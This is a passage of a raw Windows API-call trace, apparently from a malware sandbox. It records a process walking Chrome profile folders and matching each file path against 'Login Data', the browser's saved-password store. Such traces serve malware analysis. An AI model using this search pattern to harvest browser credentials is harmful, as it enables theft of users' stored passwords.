dwReserved0=0x0, dwReserved1=0x0, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0161.452] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 104 [0161.452] lstrlenW (lpString="\\") returned 1 [0161.452] GetProcessHeap () returned 0x8e0000 [0161.452] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x925718 [0161.452] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0161.452] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0161.452] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 105 [0161.452] lstrlenW (lpString="CURRENT") returned 7 [0161.452] GetProcessHeap () returned 0x8e0000 [0161.452] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xe2) returned 0x9257f8 [0161.452] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0161.452] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", lpString2="CURRENT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT" [0161.453] VirtualQuery (in: lpAddress=0x925718, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.453] GetProcessHeap () returned 0x8e0000 [0161.453] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925718 | out: hHeap=0x8e0000) returned 1 [0161.453] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT", lpSrch="Login Data") returned 0x0 [0161.453] VirtualQuery (in: lpAddress=0x9257f8, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.453] GetProcessHeap () returned 0x8e0000 [0161.453] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257f8 | out: hHeap=0x8e0000) returned 1 [0161.453] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x802d66a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOCK", cAlternateFileName="")) returned 1 [0161.453] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 104 [0161.453] lstrlenW (lpString="\\") returned 1 [0161.453] GetProcessHeap () returned 0x8e0000 [0161.453] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x925718 [0161.453] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0161.453] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0161.453] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 105 [0161.453] lstrlenW (lpString="LOCK") returned 4 [0161.453] GetProcessHeap () returned 0x8e0000 [0161.453] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xdc) returned 0x9257f8 [0161.453] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0161.453] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", lpString2="LOCK" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK" [0161.453] VirtualQuery (in: lpAddress=0x925718, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.453] GetProcessHeap () returned 0x8e0000 [0161.453] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925718 | out: hHeap=0x8e0000) returned 1 [0161.454] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK", lpSrch="Login Data") returned 0x0 [0161.454] VirtualQuery (in: lpAddress=0x9257f8, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.454] GetProcessHeap () returned 0x8e0000 [0161.454] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257f8 | out: hHeap=0x8e0000) returned 1 [0161.454] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9ab9e110, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xa7, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0161.454] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 104 [0161.454] lstrlenW (lpString="\\") returned 1 [0161.454] GetProcessHeap () returned 0x8e0000 [0161.454] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x925718 [0161.454] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0161.454] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0161.454] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 105 [0161.454] lstrlenW (lpString="LOG") returned 3 [0161.454] GetProcessHeap () returned 0x8e0000 [0161.454] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xda) returned 0x9257f8 [0161.454] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0161.454] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", lpString2="LOG" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG" [0161.454] VirtualQuery (in: lpAddress=0x925718, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.454] GetProcessHeap () returned 0x8e0000 [0161.454] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925718 | out: hHeap=0x8e0000) returned 1 [0161.454] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG", lpSrch="Login Data") returned 0x0 [0161.454] VirtualQuery (in: lpAddress=0x9257f8, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.454] GetProcessHeap () returned 0x8e0000 [0161.454] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257f8 | out: hHeap=0x8e0000) returned 1 [0161.454] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x802d66a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0161.454] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned 104 [0161.454] lstrlenW (lpString="\\") returned 1 [0161.454] GetProcessHeap () returned 0x8e0000 [0161.454] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x925718 [0161.454] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0161.454] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0161.454] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned 105 [0161.454] lstrlenW (lpString="MANIFEST-000001") returned 15 [0161.454] GetProcessHeap () returned 0x8e0000 [0161.455] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf2) returned 0x9257f8 [0161.455] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\" [0161.455] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", lpString2="MANIFEST-000001" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001" [0161.455] VirtualQuery (in: lpAddress=0x925718, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.455] GetProcessHeap () returned 0x8e0000 [0161.455] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925718 | out: hHeap=0x8e0000) returned 1 [0161.455] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001", lpSrch="Login Data") returned 0x0 [0161.455] VirtualQuery (in: lpAddress=0x9257f8, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.455] GetProcessHeap () returned 0x8e0000 [0161.455] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257f8 | out: hHeap=0x8e0000) returned 1 [0161.455] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x802d66a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 0 [0161.455] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0161.456] VirtualQuery (in: lpAddress=0x925630, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.456] GetProcessHeap () returned 0x8e0000 [0161.456] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925630 | out: hHeap=0x8e0000) returned 1 [0161.456] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.456] GetProcessHeap () returned 0x8e0000 [0161.456] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0161.456] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82bed750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extension Rules", cAlternateFileName="EXTENS~3")) returned 1 [0161.456] lstrcmpiW (lpString1="Extension Rules", lpString2=".") returned 1 [0161.456] lstrcmpiW (lpString1="Extension Rules", lpString2="..") returned 1 [0161.456] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.456] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.456] lstrlenW (lpString="\\") returned 1 [0161.456] GetProcessHeap () returned 0x8e0000 [0161.456] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0161.456] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0161.456] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.456] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0161.456] lstrlenW (lpString="Extension Rules") returned 15 [0161.456] GetProcessHeap () returned 0x8e0000 [0161.456] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb8) returned 0x925550 [0161.456] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.456] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Extension Rules" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0161.456] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.456] GetProcessHeap () returned 0x8e0000 [0161.456] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0161.456] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 91 [0161.456] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 91 [0161.456] lstrlenW (lpString="\\*.*") returned 4 [0161.456] GetProcessHeap () returned 0x8e0000 [0161.456] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x925610 [0161.456] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0161.456] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*.*" [0161.457] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*.*", lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82bed750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0161.458] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.458] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82bed750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.459] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.459] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.459] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82bed750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8dae37f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0x0, dwReserved1=0x0, cFileName="000003.log", cAlternateFileName="")) returned 1 [0161.459] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 91 [0161.459] lstrlenW (lpString="\\") returned 1 [0161.459] GetProcessHeap () returned 0x8e0000 [0161.459] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0161.459] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0161.459] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0161.459] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned 92 [0161.459] lstrlenW (lpString="000003.log") returned 10 [0161.459] GetProcessHeap () returned 0x8e0000 [0161.459] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fcdb8 [0161.459] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\" [0161.459] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\", lpString2="000003.log" | out: lpString1="C:\\Users\\5p5NrGJn0jS 